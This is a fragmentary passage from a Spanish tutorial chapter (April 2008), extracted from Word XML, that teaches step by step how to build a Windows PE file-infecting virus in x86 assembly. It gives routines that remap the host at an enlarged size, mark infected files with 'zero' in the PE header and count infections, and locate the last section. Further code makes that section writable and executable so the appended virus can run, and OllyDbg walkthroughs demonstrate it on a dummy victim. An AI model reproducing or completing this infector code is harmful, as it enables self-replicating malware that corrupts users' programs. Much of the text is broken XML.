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2</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3</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En el capítulo anterior habíamos calculado el tamaño del host más el virus, luego lo alineamos con el valor de alineamiento del host, que obtuvimos de la cabecera PE y por último este valor lo habíamos guardado en el registro EBX.</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El próximo paso a seguir sería reabrir el archivo con este nuevo tamaño, para ello utilizamos las APIs que habíamos empleado anteriormente: CreateFileMappingA y MapViewOfFile. No hace falta emplear nuevamente CreateFileA, ya que no cerramos el handle que teníamos abierto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rutina es completamente igual a la que utilizamos antes cuando abríamos por primera vez el archivo, solo cambia el tamaño, por lo que convendría meter todos esto en una subrutina y llamarla pasándole como parámetro el tamaño a mapear, pero eso se los dejo para que lo optimicen uste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si encaran la confección de esta rutina les comento que la forma “ideal” de pasarle parámetros a dicha función es a través de la pila, empujando primero los valores deseados (push), y luego recuperándolos de la misma (pop). También hay que tener en cuenta balancear la pila antes de regresar de la función, o sea dejar el registro ESP apuntando al valor que tenía antes de llamar esta función. De todas formas si solo utilizamos push-pop, sola quedará balancead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continuemos. Como la rutina es igual a lo que vimos antes no vamos a comentarla, solo la ve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cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>push    0                                        ; creamos el objeto sin nombre</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>push    ebx                                     ; tamaño del archivo + el virus (alin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t>push    0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>push    04h                                     ; 4h = PAGE_READWRITE: lectura y escritura</w:t>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 xml:space="preserve">push    0    </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>push    [ebp + offset handleCreate]  ; handle devuelto por CreateFileA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>call      [ebp + offset zCreateFile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cmp     eax, 0                                 ; si hubo un error eax devuelve 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>je        cerrarArchivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mov     [ebp + offset handleMem], eax   ; guardamos el hand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ush    ebx                                    ; tamaño del archivo + el virus (alineado)</w:t>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 xml:space="preserve">push    0 </w:t>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 xml:space="preserve">push    0 </w:t>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push    000F001Fh                         ; access mode  (acceso completo)</w:t>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 xml:space="preserve">push    [ebp + offset handleMem]   ; handle devuelto por CreateFileMappingA                                                             </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">call      [ebp + offset zMapViewOfFile]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cmp     eax, 0                                ; si hubo un error eax devuelve 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>je        cierraMapeo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mov    [ebp + offset inicioHostMem], eax     ; salvo el inicio del archivo map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ro que se vaya entendiendo todo lo que vamos haciendo, el próximo paso es marcar el archivo que vamos a infectar de alguna manera para no producir re-infecciones sobre el mismo host. Como les comenté en su momento, hay varias formas de realizar esto, yo elegí dejar una marca en un campo de la cabecera PE que no es muy utilizado, más específicamente en HeaderPE + 4Ch, y como es un dword aprovecho y lo marco con el string “zero”. Recordemos que en la variable hostPE teníamos el inicio de la cabecera PE del archivo mapeado en memoria, así que para marcar el archivo simplemente hac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hostPE]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>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dword ptr [ebx + 04Ch], "zero"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incrementaremos el contador de infecciones, para poder controlar que no infectemos más del tope de archivos que habíamos impuesto (maxInfe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Recordemos cuando veíamos en el capítulo 5 las características que iba a tener nuestro virus decíamos que sería de postpending, o sea que se va a ubicar al final del archivo infectado (mas exactamente al final de la última sección).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ra lograr esto primero debemos encontrar la última sección del host que estamos infectando. Para encontrar la última sección utilizaremos la información contenida en la tabla de secciones (capítulo 4).</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esta tabla se encuentra a continuación de la cabecera PE opcional y que tiene varias entradas (consecutivas), tantas como secciones tenga el progra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recordemos que dentro de la cabecera PE teníamos un campo que indicaba la cantidad de secciones que tiene el progra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6"/>
        <w:gridCol w:w="5126"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="30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ascii="Verdana" w:hAnsi="Verdana" w:cs="Estrangelo Edessa"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Estrangelo Edessa" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>00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ascii="Verdana" w:hAnsi="Verdana" w:cs="Estrangelo Edessa"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Estrangelo Edessa" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Wor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Estrangelo Edessa"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Estrangelo Edessa" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>NumberOfSection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Estrangelo Edessa"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Estrangelo Edessa" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Número de secciones en la tabla de secciones</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dato a tener en cuenta es que cada “entrada” de esta tabla ocupa 28h bytes, o sea que debemos ir saltando cada 28h lugares para recorrer todas estas entradas de la tab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á tenemos que hacer una aclaración, en la gran mayoría de los programas la última entrada de esta “tabla de secciones” coincide con la última sección del programa, pero como precaución iremos comprobando la ubicación de cada entrada para saber que realmente se trate de la última sección del archivo.</w:t>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haremos mirando el campo PointerToRawData de cada sección, el cual apunta al inicio de la misma en disco, o sea que la que tenga este valor más grande, será la última sección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lo vamos a hacer manualmente para que se entienda bien, luego pasaremos a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brimos el Ollydbg y cargamos el programa que mostraba un mensaje por pantalla (asm01.exe).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vamos a consultar la cabecera PE, pero no lo vamos a hacer desde ‘Show Memory window’ (M) como hicimos antes, sino que vamos a ver una forma distinta de hacerlo, de paso le vamos tomando un poco mas la mano a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la ventana de Dump, presionamos el botón derecho del mouse y seleccionamos “Go to -&gt; Expression”, también podríamos haber presionado Ctrl+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4457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44570" cy="30460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parece una ventana donde nos pide la dirección que queremos ver, colocamos 400000 que es la dirección de memoria a partir de la cual se encuentra cargado nuestro programa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2806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528060" cy="1076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resionamos OK. Ahora quedaremos parados sobre la cabecera PE, pero el formato que nos muestra es muy complicado de seguir así que presionamos nuevamente el botón derecho del mouse y seleccionamos “Special -&gt; PE He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85940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859405" cy="20529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Estrangelo Edessa"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahora si, veremos el formato de la cabecera PE mas claramente. Busquemos primero el campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Estrangelo Edessa" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NumberOfSections para ver la cantidad de secciones que tenemos en el archivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Estrangelo Edessa"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Estrangelo Edessa" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:bCs/>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47154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1" r="-10" b="-111"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3471545" cy="3238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Estrangelo Edessa"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Vemos que tenemos tres secciones, ahora tenemos que encontrar el final de la cabecera opcional. Recordemos que su tamaño no es fijo, o sea que debemos buscar dentro de la PE header el valor de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Estrangelo Edessa" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SizeOfOptionalHeader:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Estrangelo Edessa"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Estrangelo Edessa" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:bCs/>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7604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7" r="-9" b="-117"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3876040" cy="3073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vale E0h, y que la cabecera opcional comienza en C8 con el valor ‘PE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47695" cy="33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6" r="-11" b="-106"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3147695" cy="3397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ntonces la tabla de secciones la encontraremos al final de la cabecera opcional, o sea que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 de la cabecera opcional + tamaño de esta cabecera = inicio tabla se de se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8h + E0h = 1A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tonces a partir de 1A8h encontraremos la “tabla de se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1135" cy="2172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001135" cy="21723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ada 28h lugares tenemos el inicio de cada entrada correspondiente a cada sección del programa: .text, .rdata y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amos el valor del campo PointerToRawData de cada una y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xt</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>400</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data</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>600</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ata</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>800</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la última sección es .data, que comienza en la dirección 800h. En este caso se da el hecho de que la última entrada de la tabla corresponde a la última sección del archivo, pero tengamos en cuenta que esto no siempre ser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usquemos este valor en el archivo de disco. Utilizaremos el programa Hedit, abrimos el mismo programa que estábamos viendo (asm01.exe) con este aplicativo y ubicamos la dirección de la última sección, para esto presionamos Ctrl+G y le ingresamos el valor que encontramos en Ollydbg (8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62045" cy="2280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62045" cy="228028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vemos que aquí comienza dicha sección, que corresponde a los datos del progra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6285230" cy="832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7" r="-5" b="-37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6285230" cy="83248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nuestro virus se acomodará al final de dich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hacer esto mismo pero en ASM, la rutina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inicio del host mapeado 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ax + 3Ch]                     ; en 3Ch tenemos la dirección del P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si, eax                                  ; le sumamos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word ptr [esi + 14h]        ; bx = tamaño del Optional Heade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cx, word ptr [esi + 6h]          ; ecx = PE + 6h (cantidad de seccione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si + 28h]                     ; PE + 28 = dirección del entry point origina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entryPoinOrig], edx      ; lo guardam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si, ebx                                 ; le sumamos el tamaño de la PE opciona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si, 18h                                 ; le sumo 18h (el tamaño del PE Heade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si, 28h                                 ; 28h bytes (tamaño de cada entra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eax, eax                                 ; eax lo uso para almacenar el mayor valor</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bx, ebx                                 ; ebx va a apuntar al inicio de la sección may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ximaSeccio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si, 28h                                  ; esi = puntero a cada entrada de la tab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zx edi, word ptr [esi + 14h]          ; en el offset 14h tengo el PointerToRawDat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mp    edi, eax                                  ; es mayor que el almacenado en eax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l         noEsMayo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di                                 ; si es mayor, guardo el valo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y el puntero a la sección</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noEsMayor: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oop    proximaSeccion                      ; decrementa ecx y si es mayor que cero vuel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remos rápidamente lo que hace esta rutina. Primero obtenemos la dirección del inicio de la cabecera PE, le sumamos el inicio del host en memoria ya que es una RVA (Relative Virtual Address). Luego obtenemos el tamaño de la cabecera opcional (ebx), la cantidad de secciones (ecx) y el inicio de la primera sección en memoria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provechamos también y obtenemos la dirección del Entry Point original y lo guardamos, lo necesitaremos luego cuando terminemos de infectar al archiv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el Entry Point es la dirección de la primera instrucción del programa que será ejecutada por el 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hacemos un ciclo que vaya recorriendo las secciones y compruebe los PointerToRawData de cada una para encontrar el may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vamos a tener que declarar una variable en la sección de datos de nuestro virus para almacenar el OEP (Original Entry Poi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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>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entryPoinOrig   dd 0                     ;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compilemos el programa y ejecutémoslo con Ollydbg dentro un directorio donde tengamos también varias copias de nuestra falsa víctima (programa que muestra un mensaje por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mos con F8 los primeros CALLs y nos paramos sobre el CALL que apunta a nuestr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45840" cy="1223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3545840" cy="12230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tramos al mismo con F7 y vamos bajando en el código, y  encontraremos nuestra rutina que recorre la tabla de se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860675"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2" r="-11" b="-22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2860675" cy="14795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jemos que se ejecute completamente y veamos que valor obtiene en los registros EAX y EB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391920" cy="833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3" r="-26" b="-43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1391920" cy="8337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AX = 8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t>EBX = 3901F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AX corresponde al inicio de la sección en disco (0800h) que coincide con el valor que obtuvimos manualmente, y EBX apunta al inicio de la entrada en la tabla de secciones para la misma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tilizaremos este valor para cambiar las características  de la sección para darle permisos de lectura, escritura y ejecución a la misma, ya que va a contener el código de nuestro virus y el mismo debe ser ejecut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esto simplemente debemos cambiar el valor del campo Characteristics de esta entrad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903"/>
        <w:gridCol w:w="2665"/>
        <w:gridCol w:w="5286"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="34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620" w:leader="none"/>
              </w:tabs>
              <w:spacing w:before="280" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Estrangelo Edessa"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Estrangelo Edessa" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>0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620" w:leader="none"/>
              </w:tabs>
              <w:spacing w:before="280" w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Estrangelo Edessa"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Estrangelo Edessa" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Dword</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620" w:leader="none"/>
              </w:tabs>
              <w:spacing w:before="280" w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Estrangelo Edessa"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Estrangelo Edessa" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Characteristics</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620" w:leader="none"/>
              </w:tabs>
              <w:spacing w:before="280" w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Estrangelo Edessa"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Estrangelo Edessa" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Características de la sección</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darle estos permisos a la sección debemos sumar las características que des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421" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="1327" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1931"/>
        <w:gridCol w:w="4490"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3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00000020</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Contiene código ejecutable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3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20000000</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Se puede ejecutar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3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0000</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Se puede leer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3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80000000</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Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Se puede escribir en la sección</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nos d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0000002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000000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>+  4000000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8000000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0000020</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esto hac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n-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Verdana" w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>---------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1620" w:leader="none"/>
        </w:tabs>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or      dword ptr [esi + 24h], 0E0000020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tilizamos un OR para agregarle estas características pero manteniendo las que pudiera tener originalmente, para evitar posibles problemas co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entender bien todo esto que vimos es muy importante comprender bien el capítulo 4, por lo que les recomiendo que lo vuelvan a mirar si algo no les queda del todo clar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próximo capítulo continuaremos con la infección, ya queda poco así que les pido paci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Abril de 2008</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_PictureBullets"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId14"/>
      <w:footerReference w:type="default" r:id="rId15"/>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2</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4-04T17:39:00Z</dcterms:modified>
  <cp:revision>2599</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>